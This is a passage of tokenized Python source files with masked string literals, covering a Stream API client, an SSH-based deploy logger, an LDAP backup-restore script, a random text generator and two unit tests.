api_key ) <EOL> return params <EOL> def get_default_header ( self ) : <EOL> base_headers = { <EOL> '<STR_LIT>' : '<STR_LIT:application/json>' , <EOL> '<STR_LIT>' : self . get_user_agent ( ) <EOL> } <EOL> return base_headers <EOL> def get_full_url ( self , relative_url ) : <EOL> url = self . base_url + self . version + '<STR_LIT:/>' + relative_url <EOL> return url <EOL> def get_user_agent ( self ) : <EOL> from stream import __version__ <EOL> agent = '<STR_LIT>' % __version__ <EOL> return agent <EOL> def _parse_response ( self , response ) : <EOL> try : <EOL> parsed_result = serializer . loads ( response . text ) <EOL> except ValueError : <EOL> parsed_result = None <EOL> if parsed_result is None or parsed_result . get ( '<STR_LIT>' ) or response . status_code >= <NUM_LIT> : <EOL> self . raise_exception ( parsed_result , status_code = response . status_code ) <EOL> return parsed_result <EOL> def _make_signed_request ( self , method_name , relative_url , params = None , data = None ) : <EOL> params = params or { } <EOL> data = data or { } <EOL> serialized = None <EOL> headers = self . get_default_header ( ) <EOL> headers [ '<STR_LIT>' ] = self . api_key <EOL> date_header = datetime . utcnow ( ) . strftime ( '<STR_LIT>' ) <EOL> headers [ '<STR_LIT>' ] = date_header <EOL> default_params = self . get_default_params ( ) <EOL> default_params . update ( params ) <EOL> url = self . get_full_url ( relative_url ) <EOL> serialized = serializer . dumps ( data ) <EOL> method = getattr ( self . session , method_name ) <EOL> if method_name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> serialized = serializer . dumps ( data ) <EOL> response = method ( url , auth = self . auth , data = serialized , headers = headers , <EOL> params = default_params , timeout = self . timeout ) <EOL> logger . debug ( '<STR_LIT>' , <EOL> response . url , headers , data ) <EOL> return self . 
_parse_response ( response ) <EOL> def create_jwt_token ( self , resource , action , feed_id = None , user_id = None ) : <EOL> '''<STR_LIT>''' <EOL> payload = { <EOL> '<STR_LIT:action>' : action , <EOL> '<STR_LIT>' : resource <EOL> } <EOL> if feed_id is not None : <EOL> payload [ '<STR_LIT>' ] = feed_id <EOL> if user_id is not None : <EOL> payload [ '<STR_LIT>' ] = user_id <EOL> return jwt . encode ( payload , self . api_secret ) <EOL> def _make_request ( self , method , relative_url , signature , params = None , data = None ) : <EOL> params = params or { } <EOL> data = data or { } <EOL> serialized = None <EOL> default_params = self . get_default_params ( ) <EOL> default_params . update ( params ) <EOL> headers = self . get_default_header ( ) <EOL> headers [ '<STR_LIT>' ] = signature <EOL> headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> url = self . get_full_url ( relative_url ) <EOL> if method . __name__ in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> serialized = serializer . dumps ( data ) <EOL> response = method ( url , data = serialized , headers = headers , <EOL> params = default_params , timeout = self . timeout ) <EOL> logger . debug ( '<STR_LIT>' , <EOL> response . url , headers , data ) <EOL> return self . _parse_response ( response ) <EOL> def raise_exception ( self , result , status_code ) : <EOL> '''<STR_LIT>''' <EOL> from stream . exceptions import get_exception_dict <EOL> exception_class = exceptions . StreamApiException <EOL> def errors_from_fields ( exception_fields ) : <EOL> result = [ ] <EOL> for field , errors in exception_fields . items ( ) : <EOL> errors . append ( '<STR_LIT>' % ( field , repr ( errors ) ) ) <EOL> return result <EOL> if result is not None : <EOL> error_message = result [ '<STR_LIT>' ] <EOL> exception_fields = result . 
get ( '<STR_LIT>' ) <EOL> if exception_fields is not None : <EOL> errors = [ ] <EOL> if isinstance ( exception_fields , list ) : <EOL> errors = [ errors_from_fields ( exception_dict ) for exception_dict in exception_fields ] <EOL> errors = [ item for sublist in errors for item in sublist ] <EOL> else : <EOL> errors = errors_from_fields ( exception_fields ) <EOL> error_message = '<STR_LIT:\n>' . join ( errors ) <EOL> error_code = result . get ( '<STR_LIT:code>' ) <EOL> exception_dict = get_exception_dict ( ) <EOL> exception_class = exception_dict . get ( <EOL> error_code , exceptions . StreamApiException ) <EOL> else : <EOL> error_message = '<STR_LIT>' % status_code <EOL> exception = exception_class ( error_message , status_code = status_code ) <EOL> raise exception <EOL> def post ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> return self . _make_request ( self . session . post , * args , ** kwargs ) <EOL> def get ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> return self . _make_request ( self . session . get , * args , ** kwargs ) <EOL> def delete ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> return self . _make_request ( self . session . delete , * args , ** kwargs ) <EOL> def add_to_many ( self , activity , feeds ) : <EOL> '''<STR_LIT>''' <EOL> data = { '<STR_LIT>' : activity , '<STR_LIT>' : feeds } <EOL> self . _make_signed_request ( '<STR_LIT>' , '<STR_LIT>' , data = data ) <EOL> def follow_many ( self , follows , activity_copy_limit = None ) : <EOL> '''<STR_LIT>''' <EOL> params = None <EOL> if activity_copy_limit != None : <EOL> params = dict ( activity_copy_limit = activity_copy_limit ) <EOL> self . _make_signed_request ( '<STR_LIT>' , '<STR_LIT>' , params = params , data = follows ) <EOL> def update_activities ( self , activities ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( activities , ( list , tuple , set ) ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> auth_token = self . 
create_jwt_token ( '<STR_LIT>' , '<STR_LIT:*>' , feed_id = '<STR_LIT:*>' ) <EOL> data = dict ( activities = activities ) <EOL> return self . post ( '<STR_LIT>' , auth_token , data = data ) <EOL> def update_activity ( self , activity ) : <EOL> '''<STR_LIT>''' <EOL> return self . update_activities ( [ activity ] ) <EOL> def create_redirect_url ( self , target_url , user_id , events ) : <EOL> '''<STR_LIT>''' <EOL> auth_token = self . create_jwt_token ( '<STR_LIT>' , '<STR_LIT:*>' , user_id = user_id ) <EOL> params = dict ( auth_type = '<STR_LIT>' , authorization = auth_token , url = target_url ) <EOL> params [ '<STR_LIT>' ] = self . api_key <EOL> params [ '<STR_LIT>' ] = json . dumps ( events ) <EOL> url = self . base_analytics_url + '<STR_LIT>' <EOL> request = Request ( '<STR_LIT:GET>' , url , params = params ) <EOL> prepared_request = request . prepare ( ) <EOL> Request ( '<STR_LIT:GET>' , target_url ) . prepare ( ) <EOL> return prepared_request . url </s>
<s> """<STR_LIT>""" <EOL> __date__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> import re <EOL> from git_deploy . utils import ssh_command_target <EOL> from git_deploy . config import log <EOL> class DeployLogError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message = "<STR_LIT>" , exit_code = <NUM_LIT:1> ) : <EOL> Exception . __init__ ( self , message ) <EOL> self . _exit_code = int ( exit_code ) <EOL> @ property <EOL> def exit_code ( self ) : <EOL> return self . _exit_code <EOL> class DeployLogDefault ( object ) : <EOL> """<STR_LIT>""" <EOL> LOGNAME_ARCHIVE = '<STR_LIT>' <EOL> LOGNAME_ACTIVE = '<STR_LIT>' <EOL> __instance = None <EOL> def __init__ ( self , target , path , user , local_key_path ) : <EOL> """<STR_LIT>""" <EOL> self . __class__ . __instance = self <EOL> self . target = target <EOL> self . path = path + '<STR_LIT>' <EOL> self . user = user <EOL> self . key_path = local_key_path <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if not cls . __instance : <EOL> cls . __instance = super ( DeployLogDefault , cls ) . __new__ ( cls ) <EOL> return cls . __instance <EOL> def _check_and_add ( self , path , filename ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( path , filename ) <EOL> ret = ssh_command_target ( cmd , self . target , self . user , self . key_path ) <EOL> if int ( ret [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . strip ( ) ) > <NUM_LIT:0> : <EOL> cmd = '<STR_LIT>' . format ( path , filename ) <EOL> ssh_command_target ( cmd , self . target , self . user , self . key_path ) <EOL> def log ( self , line ) : <EOL> """<STR_LIT>""" <EOL> self . _check_and_add ( self . path , self . LOGNAME_ACTIVE ) <EOL> re . escape ( line ) <EOL> cmd = "<STR_LIT>" . format ( line , self . path , <EOL> self . LOGNAME_ACTIVE ) <EOL> try : <EOL> ssh_command_target ( cmd , self . target , self . user , self . key_path ) <EOL> except : <EOL> log . error ( "<STR_LIT>" . 
format ( line ) ) <EOL> return False <EOL> return True <EOL> def log_archive ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _check_and_add ( self . path , self . LOGNAME_ARCHIVE ) <EOL> cmd = "<STR_LIT>" . format ( self . path , <EOL> self . LOGNAME_ACTIVE , <EOL> self . path , <EOL> self . LOGNAME_ARCHIVE ) <EOL> try : <EOL> ssh_command_target ( cmd , self . target , self . user , self . key_path ) <EOL> except : <EOL> log . error ( "<STR_LIT>" ) <EOL> return False <EOL> cmd = "<STR_LIT>" . format ( self . path , self . LOGNAME_ACTIVE ) <EOL> try : <EOL> ssh_command_target ( cmd , self . target , self . user , self . key_path ) <EOL> except : <EOL> log . error ( "<STR_LIT>" ) <EOL> return False <EOL> return True </s>
<s> import os <EOL> import os . path <EOL> import shutil <EOL> import sys <EOL> import traceback <EOL> from ldif import LDIFParser <EOL> from jsonmerge import merge <EOL> import base64 <EOL> import json <EOL> import uuid <EOL> import tempfile <EOL> import logging <EOL> password_file = tempfile . mkstemp ( ) [ <NUM_LIT:1> ] <EOL> backup24_folder = None <EOL> backup_version = None <EOL> current_version = None <EOL> service = "<STR_LIT>" <EOL> ldapmodify = "<STR_LIT>" <EOL> ldapsearch = "<STR_LIT>" <EOL> ldapdelete = "<STR_LIT>" <EOL> ignore_files = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ldap_creds = [ '<STR_LIT>' , '<STR_LIT:localhost>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , password_file <EOL> ] <EOL> logging . basicConfig ( level = logging . DEBUG , <EOL> format = '<STR_LIT>' , <EOL> filename = '<STR_LIT>' , <EOL> filemode = '<STR_LIT:w>' ) <EOL> console = logging . StreamHandler ( ) <EOL> console . setLevel ( logging . INFO ) <EOL> formatter = logging . Formatter ( '<STR_LIT>' ) <EOL> console . setFormatter ( formatter ) <EOL> logging . getLogger ( '<STR_LIT>' ) . addHandler ( console ) <EOL> class MyLDIF ( LDIFParser ) : <EOL> def __init__ ( self , input , output ) : <EOL> LDIFParser . __init__ ( self , input ) <EOL> self . targetDN = None <EOL> self . targetAttr = None <EOL> self . targetEntry = None <EOL> self . DNs = [ ] <EOL> self . lastDN = None <EOL> self . lastEntry = None <EOL> def getResults ( self ) : <EOL> return ( self . targetDN , self . targetAttr ) <EOL> def getDNs ( self ) : <EOL> return self . DNs <EOL> def getLastEntry ( self ) : <EOL> return self . lastEntry <EOL> def handle ( self , dn , entry ) : <EOL> if self . targetDN is None : <EOL> self . targetDN = dn <EOL> self . lastDN = dn <EOL> self . DNs . append ( dn ) <EOL> self . 
lastEntry = entry <EOL> if dn . lower ( ) . strip ( ) == self . targetDN . lower ( ) . strip ( ) : <EOL> self . targetEntry = entry <EOL> if self . targetAttr in entry : <EOL> self . targetAttr = entry [ self . targetAttr ] <EOL> def addEntry ( dn , entry , ldifModFolder ) : <EOL> newLdif = """<STR_LIT>""" % dn <EOL> for attr in entry . keys ( ) : <EOL> for value in entry [ attr ] : <EOL> newLdif = newLdif + getMod ( attr , value ) <EOL> newLdif = newLdif + "<STR_LIT:\n>" <EOL> new_fn = str ( len ( dn . split ( '<STR_LIT:U+002C>' ) ) ) + '<STR_LIT:_>' + str ( uuid . uuid4 ( ) ) <EOL> filename = '<STR_LIT>' % ( ldifModFolder , new_fn ) <EOL> f = open ( filename , '<STR_LIT:w>' ) <EOL> f . write ( newLdif ) <EOL> f . close ( ) <EOL> def getNewConfig ( fn ) : <EOL> args = [ ldapsearch ] + ldap_creds + [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> output = getOutput ( args ) <EOL> f = open ( fn , '<STR_LIT:w>' ) <EOL> f . write ( output ) <EOL> f . close ( ) <EOL> logging . info ( "<STR_LIT>" % fn ) <EOL> def copyFiles ( backup24_folder ) : <EOL> logging . info ( '<STR_LIT>' ) <EOL> os . path . walk ( "<STR_LIT>" % backup24_folder , walk_function , None ) <EOL> os . path . walk ( "<STR_LIT>" % backup24_folder , walk_function , None ) <EOL> os . path . walk ( "<STR_LIT>" % backup24_folder , walk_function , None ) <EOL> def deleteEntries ( dn_list ) : <EOL> for dn in dn_list : <EOL> cmd = [ ldapdelete ] + ldap_creds + [ dn ] <EOL> output = getOutput ( cmd ) <EOL> if output : <EOL> logging . info ( output ) <EOL> else : <EOL> logging . error ( "<STR_LIT>" % dn ) <EOL> def getAttributeValue ( fn , targetAttr ) : <EOL> parser = MyLDIF ( open ( fn , '<STR_LIT:rb>' ) , sys . stdout ) <EOL> parser . targetAttr = targetAttr <EOL> parser . parse ( ) <EOL> value = parser . targetAttr <EOL> return value <EOL> def getOldEntryMap ( folder ) : <EOL> files = os . 
listdir ( folder ) <EOL> dnMap = { } <EOL> admin_dn = getDns ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> for fn in files : <EOL> if '<STR_LIT>' in fn and '<STR_LIT>' in backup_version : <EOL> continue <EOL> dnList = getDns ( "<STR_LIT>" % ( folder , fn ) ) <EOL> for dn in dnList : <EOL> if fn == '<STR_LIT>' and admin_dn in dn : <EOL> continue <EOL> dnMap [ dn ] = fn <EOL> return dnMap <EOL> def getEntry ( fn , dn ) : <EOL> parser = MyLDIF ( open ( fn , '<STR_LIT:rb>' ) , sys . stdout ) <EOL> parser . targetDN = dn <EOL> parser . parse ( ) <EOL> return parser . targetEntry <EOL> def getDns ( fn ) : <EOL> parser = MyLDIF ( open ( fn , '<STR_LIT:rb>' ) , sys . stdout ) <EOL> parser . parse ( ) <EOL> return parser . DNs <EOL> def getMod ( attr , s ) : <EOL> val = str ( s ) . strip ( ) <EOL> if val . find ( '<STR_LIT:\n>' ) > - <NUM_LIT:1> : <EOL> val = base64 . b64encode ( val ) <EOL> return "<STR_LIT>" % tab_attr ( attr , val , True ) <EOL> elif len ( val ) > ( <NUM_LIT> - len ( attr ) ) : <EOL> return "<STR_LIT>" % tab_attr ( attr , val ) <EOL> else : <EOL> return "<STR_LIT>" % ( attr , val ) <EOL> def getOutput ( args ) : <EOL> try : <EOL> logging . debug ( "<STR_LIT>" % "<STR_LIT:U+0020>" . join ( args ) ) <EOL> output = os . popen ( "<STR_LIT:U+0020>" . join ( args ) ) . read ( ) . strip ( ) <EOL> return output <EOL> except : <EOL> logging . error ( "<STR_LIT>" % "<STR_LIT:U+0020>" . join ( args ) ) <EOL> logging . error ( traceback . format_exc ( ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def restoreConfig ( ldifFolder , newLdif , ldifModFolder ) : <EOL> logging . info ( '<STR_LIT>' ) <EOL> ignoreList = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> current_config_dns = getDns ( newLdif ) <EOL> oldDnMap = getOldEntryMap ( ldifFolder ) <EOL> for dn in oldDnMap . 
keys ( ) : <EOL> old_entry = getEntry ( "<STR_LIT>" % ( ldifFolder , oldDnMap [ dn ] ) , dn ) <EOL> if dn not in current_config_dns : <EOL> addEntry ( dn , old_entry , ldifModFolder ) <EOL> continue <EOL> new_entry = getEntry ( newLdif , dn ) <EOL> for attr in old_entry . keys ( ) : <EOL> new_fn = str ( len ( dn . split ( '<STR_LIT:U+002C>' ) ) ) + '<STR_LIT:_>' + str ( uuid . uuid4 ( ) ) <EOL> filename = '<STR_LIT>' % ( ldifModFolder , new_fn ) <EOL> if attr in ignoreList : <EOL> continue <EOL> if attr not in new_entry : <EOL> writeMod ( dn , attr , old_entry [ attr ] , filename , True ) <EOL> logging . debug ( "<STR_LIT>" , attr , dn ) <EOL> elif old_entry [ attr ] != new_entry [ attr ] : <EOL> mod_list = None <EOL> if len ( old_entry [ attr ] ) == <NUM_LIT:1> : <EOL> try : <EOL> logging . debug ( "<STR_LIT>" , attr ) <EOL> old_json = json . loads ( old_entry [ attr ] [ <NUM_LIT:0> ] ) <EOL> new_json = json . loads ( new_entry [ attr ] [ <NUM_LIT:0> ] ) <EOL> new_json = merge ( new_json , old_json ) <EOL> mod_list = [ json . dumps ( new_json ) ] <EOL> except : <EOL> mod_list = old_entry [ attr ] <EOL> logging . debug ( "<STR_LIT>" , attr ) <EOL> else : <EOL> mod_list = old_entry [ attr ] <EOL> logging . debug ( "<STR_LIT>" , attr ) <EOL> writeMod ( dn , attr , mod_list , filename ) <EOL> def startOpenDJ ( ) : <EOL> logging . info ( '<STR_LIT>' ) <EOL> output = getOutput ( [ service , '<STR_LIT>' , '<STR_LIT:start>' ] ) <EOL> if output . find ( "<STR_LIT>" ) > <NUM_LIT:0> : <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> logging . critical ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> def stopOpenDJ ( ) : <EOL> logging . info ( '<STR_LIT>' ) <EOL> output = getOutput ( [ service , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if output . find ( "<STR_LIT>" ) > <NUM_LIT:0> : <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> logging . critical ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> sys . 
exit ( <NUM_LIT:3> ) <EOL> def tab_attr ( attr , value , encoded = False ) : <EOL> lines = [ '<STR_LIT>' % attr ] <EOL> if encoded : <EOL> lines = [ '<STR_LIT>' % attr ] <EOL> for char in value : <EOL> current_line = lines [ - <NUM_LIT:1> ] <EOL> if len ( current_line ) < <NUM_LIT> : <EOL> new_line = current_line + char <EOL> del lines [ - <NUM_LIT:1> ] <EOL> lines . append ( new_line ) <EOL> else : <EOL> lines . append ( "<STR_LIT:U+0020>" + char ) <EOL> return "<STR_LIT:\n>" . join ( lines ) <EOL> def uploadLDIF ( ldifFolder , outputLdifFolder ) : <EOL> logging . info ( '<STR_LIT>' ) <EOL> files = sorted ( os . listdir ( outputLdifFolder ) ) <EOL> for fn in files : <EOL> cmd = [ ldapmodify ] + ldap_creds + [ '<STR_LIT>' , '<STR_LIT>' , <EOL> "<STR_LIT>" % ( outputLdifFolder , fn ) ] <EOL> output = getOutput ( cmd ) <EOL> if output : <EOL> logging . debug ( output ) <EOL> else : <EOL> logging . error ( "<STR_LIT>" , fn ) <EOL> def walk_function ( a , directory , files ) : <EOL> if '<STR_LIT>' in current_version and '<STR_LIT>' not in backup_version : <EOL> ignore_folders = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for folder in ignore_folders : <EOL> if folder in directory : <EOL> return <EOL> for f in files : <EOL> if f in ignore_files : <EOL> continue <EOL> fn = "<STR_LIT>" % ( directory , f ) <EOL> targetFn = fn . replace ( backup24_folder , '<STR_LIT>' ) <EOL> if os . path . isdir ( fn ) : <EOL> if not os . path . exists ( targetFn ) : <EOL> os . mkdir ( targetFn ) <EOL> else : <EOL> try : <EOL> logging . debug ( "<STR_LIT>" , targetFn ) <EOL> shutil . copyfile ( fn , targetFn ) <EOL> except : <EOL> logging . error ( "<STR_LIT>" , targetFn ) <EOL> def writeMod ( dn , attr , value_list , fn , add = False ) : <EOL> operation = "<STR_LIT:replace>" <EOL> if add : <EOL> operation = "<STR_LIT>" <EOL> modLdif = """<STR_LIT>""" % ( dn , operation , attr ) <EOL> if value_list is None : <EOL> logging . 
warning ( '<STR_LIT>' , attr ) <EOL> return <EOL> for val in value_list : <EOL> modLdif = modLdif + getMod ( attr , val ) <EOL> modLdif = modLdif + "<STR_LIT:\n>" <EOL> f = open ( fn , '<STR_LIT:w>' ) <EOL> f . write ( modLdif ) <EOL> f . close ( ) <EOL> logging . debug ( '<STR_LIT>' , attr , fn ) <EOL> def stopTomcat ( ) : <EOL> logging . info ( '<STR_LIT>' ) <EOL> output = getOutput ( [ service , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> logging . debug ( output ) <EOL> def startTomcat ( ) : <EOL> logging . info ( '<STR_LIT>' ) <EOL> output = getOutput ( [ service , '<STR_LIT>' , '<STR_LIT:start>' ] ) <EOL> logging . debug ( output ) <EOL> def preparePasswordFile ( ) : <EOL> with open ( '<STR_LIT>' , '<STR_LIT:r>' ) as sfile : <EOL> for line in sfile : <EOL> if '<STR_LIT>' in line : <EOL> with open ( password_file , '<STR_LIT:w>' ) as pfile : <EOL> pfile . write ( line . split ( '<STR_LIT:=>' ) [ - <NUM_LIT:1> ] ) <EOL> break <EOL> def getCurrentVersion ( ) : <EOL> with open ( '<STR_LIT>' , '<STR_LIT:r>' ) as f : <EOL> for line in f : <EOL> if '<STR_LIT>' in line : <EOL> return line . split ( '<STR_LIT::>' ) [ - <NUM_LIT:1> ] . strip ( ) <EOL> def getBackupVersion ( ) : <EOL> with open ( os . path . join ( backup24_folder , '<STR_LIT>' ) , '<STR_LIT:r>' ) as f : <EOL> for line in f : <EOL> if '<STR_LIT>' in line : <EOL> return line . split ( '<STR_LIT:=>' ) [ - <NUM_LIT:1> ] . strip ( ) <EOL> def main ( folder_name ) : <EOL> global backup24_folder , backup_version , current_version , service <EOL> backup24_folder = folder_name <EOL> if not os . path . exists ( backup24_folder ) : <EOL> logging . critical ( "<STR_LIT>" , backup24_folder ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> etc_folder = os . path . join ( backup24_folder , '<STR_LIT>' ) <EOL> opt_folder = os . path . join ( backup24_folder , '<STR_LIT>' ) <EOL> ldif_folder = os . path . join ( backup24_folder , '<STR_LIT>' ) <EOL> if not ( os . path . exists ( etc_folder ) and os . path . 
exists ( opt_folder ) and <EOL> os . path . exists ( ldif_folder ) ) : <EOL> logging . critical ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> backup_version = getBackupVersion ( ) <EOL> current_version = getCurrentVersion ( ) <EOL> if '<STR_LIT>' in current_version and '<STR_LIT>' not in backup_version : <EOL> skip_files = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> global ignore_files <EOL> ignore_files += skip_files <EOL> outputFolder = "<STR_LIT>" <EOL> outputLdifFolder = "<STR_LIT>" % outputFolder <EOL> newLdif = "<STR_LIT>" % outputFolder <EOL> if not os . path . exists ( outputFolder ) : <EOL> os . mkdir ( outputFolder ) <EOL> if not os . path . exists ( outputLdifFolder ) : <EOL> os . mkdir ( outputLdifFolder ) <EOL> service = getOutput ( [ '<STR_LIT>' , '<STR_LIT>' ] ) . split ( '<STR_LIT:U+0020>' ) [ <NUM_LIT:1> ] . strip ( ) <EOL> stopTomcat ( ) <EOL> preparePasswordFile ( ) <EOL> stopOpenDJ ( ) <EOL> copyFiles ( backup24_folder ) <EOL> startOpenDJ ( ) <EOL> getNewConfig ( newLdif ) <EOL> restoreConfig ( ldif_folder , newLdif , outputLdifFolder ) <EOL> uploadLDIF ( ldif_folder , outputLdifFolder ) <EOL> startTomcat ( ) <EOL> os . remove ( password_file ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if len ( sys . argv ) != <NUM_LIT:2> : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> else : <EOL> main ( sys . argv [ <NUM_LIT:1> ] ) </s>
<s> import string <EOL> """<STR_LIT>""" <EOL> leadins = """<STR_LIT>""" <EOL> subjects = """<STR_LIT>""" <EOL> verbs = """<STR_LIT>""" <EOL> objects = """<STR_LIT>""" <EOL> import textwrap , random <EOL> from itertools import chain , islice , izip <EOL> def generate_chomsky ( times = <NUM_LIT:5> , line_length = <NUM_LIT> ) : <EOL> parts = [ ] <EOL> for part in ( leadins , subjects , verbs , objects ) : <EOL> phraselist = map ( str . strip , part . splitlines ( ) ) <EOL> random . shuffle ( phraselist ) <EOL> parts . append ( phraselist ) <EOL> output = chain ( * islice ( izip ( * parts ) , <NUM_LIT:0> , times ) ) <EOL> return textwrap . fill ( string . join ( output ) , line_length ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> generate_chomsky ( ) </s>
<s> """<STR_LIT>""" <EOL> import cStringIO <EOL> import json <EOL> from google . appengine . ext import ndb <EOL> import logging <EOL> from lib . crud import crud_handler <EOL> from lib . crud import crud_model <EOL> from lib . crud import crud_test <EOL> class SampleNdb ( crud_model . CrudNdbModel ) : <EOL> name = ndb . StringProperty ( ) <EOL> count = ndb . IntegerProperty ( ) <EOL> class CrudHandlerTest ( crud_test . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def assertJsonReplyEqual ( self , ans , expected ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( ans . startswith ( crud_handler . JSON_PREFIX ) ) <EOL> self . assertTrue ( expected . startswith ( crud_handler . JSON_PREFIX ) ) <EOL> ans = json . loads ( ans [ len ( crud_handler . JSON_PREFIX ) : ] ) <EOL> expected = json . loads ( expected [ len ( crud_handler . JSON_PREFIX ) : ] ) <EOL> self . assertSameStructure ( ans , expected ) <EOL> def testGetNew ( self ) : <EOL> handler = crud_handler . GetCrudHandler ( SampleNdb ) ( ) <EOL> handler . request = { '<STR_LIT:id>' : '<STR_LIT>' } <EOL> class MockResponse ( object ) : <EOL> out = cStringIO . StringIO ( ) <EOL> headers = { } <EOL> handler . response = MockResponse ( ) <EOL> handler . get ( ) <EOL> ans = handler . response . out . getvalue ( ) <EOL> expected = """<STR_LIT>""" <EOL> self . assertJsonReplyEqual ( ans , expected ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> crud_test . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import mock <EOL> from src import basetest <EOL> from src . hadoop import datastore <EOL> from src . hadoop import hadoop_csv_transformer <EOL> class HadoopCsvTransformerTest ( basetest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( HadoopCsvTransformerTest , self ) . setUp ( ) <EOL> self . mock_gcs_new = mock . patch ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) . start ( ) <EOL> self . mock_gcs = self . mock_gcs_new . return_value <EOL> self . mock_urlopen = mock . patch ( '<STR_LIT>' ) . start ( ) <EOL> self . mock_urlopen . return_value . read . return_value = '<STR_LIT>' <EOL> self . mock_sleep = mock . patch ( '<STR_LIT>' ) . start ( ) <EOL> self . transform_config = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def tearDown ( self ) : <EOL> super ( HadoopCsvTransformerTest , self ) . tearDown ( ) <EOL> mock . patch . stopall ( ) <EOL> def testTransform_NoHadoopCluster ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( hadoop_csv_transformer . HadoopError , <EOL> hadoop_csv_transformer . HadoopCsvTransformer , <EOL> self . transform_config ) <EOL> def testTransform ( self ) : <EOL> """<STR_LIT>""" <EOL> cluster_info = datastore . ClusterInfo ( ) <EOL> cluster_info . put ( ) <EOL> instance_info = datastore . InstanceInfo ( ) <EOL> instance_info . put ( ) <EOL> cluster_info . SetMasterInstance ( instance_info ) <EOL> cluster_info . SetMasterIpAddress ( '<STR_LIT>' ) <EOL> transformer = hadoop_csv_transformer . HadoopCsvTransformer ( <EOL> self . transform_config ) <EOL> transformer . StartTransform ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , self . mock_gcs_new . call_count ) <EOL> self . mock_gcs . OpenObject . assert_any_call ( '<STR_LIT>' ) <EOL> self . mock_gcs . OpenObject . assert_any_call ( '<STR_LIT>' , mode = '<STR_LIT:w>' ) <EOL> self . mock_gcs . OpenObject . 
assert_any_call ( <EOL> '<STR_LIT>' , mode = '<STR_LIT:w>' ) <EOL> self . assertEqual ( <NUM_LIT:2> , self . mock_urlopen . call_count ) <EOL> request = self . mock_urlopen . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> request . get_full_url ( ) ) <EOL> self . assertEqual ( <EOL> <NUM_LIT:0> , request . headers [ '<STR_LIT>' ] . find ( '<STR_LIT>' ) ) <EOL> body = self . mock_urlopen . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> self . assertNotEqual ( - <NUM_LIT:1> , body . find ( json . dumps ( self . transform_config ) ) ) <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> self . mock_urlopen . call_args_list [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , self . mock_sleep . call_count ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> basetest . main ( ) </s>
